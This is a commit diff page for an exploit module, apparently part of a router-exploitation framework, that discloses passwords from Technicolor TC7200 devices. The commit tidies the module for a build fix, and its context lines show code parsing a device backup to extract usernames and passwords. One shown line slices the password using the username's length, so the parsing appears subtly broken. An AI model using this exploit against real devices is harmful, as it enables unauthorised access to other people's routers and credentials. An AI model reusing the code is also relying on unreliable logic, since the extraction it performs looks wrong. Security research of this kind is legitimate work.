Commit bad86479 by Laurent Meirlaen

TC7200 password disclosure v2 : fix travis build

No related merge requests found
......@@ -32,7 +32,6 @@ class Exploit(exploits.Exploit):
'devices': [
'Technicolor TC7200',
],
'disclosure_date': '2016-07-25',
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
......@@ -66,7 +65,6 @@ class Exploit(exploits.Exploit):
nh = struct.unpack('!H', backup[p:p + 2])[0]
name = backup[p + 2:p + 2 + nh]
p += 2 + nh
ph = struct.unpack('!H', backup[p:p + 2])[0]
pwd = backup[p + 2:p + 2 + nh]
return name, pwd
return '', ''
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment